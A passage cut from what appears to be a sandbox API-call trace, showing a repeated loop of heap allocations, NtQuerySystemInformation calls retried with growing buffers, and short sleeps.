ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.427] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0290.427] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0290.427] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.428] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0290.428] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.428] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.428] Sleep (dwMilliseconds=0x110) [0290.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0290.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0290.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0290.442] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0290.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0290.442] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.443] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0290.443] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0290.443] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.443] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0290.443] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.444] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.444] Sleep (dwMilliseconds=0x110) [0290.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0290.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0290.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0290.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0290.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0290.457] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0290.458] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0290.458] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0290.458] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.459] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.459] Sleep (dwMilliseconds=0x110) [0290.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0290.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0290.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0290.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0290.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0290.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0290.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0290.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0290.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.470] Sleep (dwMilliseconds=0x110) [0290.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0290.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0290.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0290.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0290.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0290.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0290.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0290.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0290.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.489] Sleep (dwMilliseconds=0x110) [0290.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0290.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0290.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0290.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0290.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0290.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0290.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0290.505] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0290.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.506] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.506] Sleep (dwMilliseconds=0x110) [0290.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0290.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.513] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0290.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0290.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0290.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0290.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0290.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0290.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0290.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.520] Sleep (dwMilliseconds=0x110) [0290.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0290.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0290.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0290.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0290.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0290.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0290.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0290.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0290.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.535] Sleep (dwMilliseconds=0x110) [0290.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0290.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0290.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0290.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0290.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0290.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0290.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0290.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0290.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.550] Sleep (dwMilliseconds=0x110) [0290.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0290.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0290.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0290.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0290.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0290.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0290.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0290.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0290.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.583] Sleep (dwMilliseconds=0x110) [0290.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0290.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0290.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0290.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0290.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0290.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0290.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0290.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0290.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.600] Sleep (dwMilliseconds=0x110) [0290.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0290.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0290.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0290.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0290.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0290.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0290.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0290.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0290.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.612] Sleep (dwMilliseconds=0x110) [0290.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0290.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0290.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0290.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0290.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0290.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0290.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0290.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0290.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.628] Sleep (dwMilliseconds=0x110) [0290.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0290.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0290.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0290.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0290.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0290.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0290.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0290.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0290.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.644] Sleep (dwMilliseconds=0x110) [0290.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0290.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0290.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0290.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0290.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0290.671] 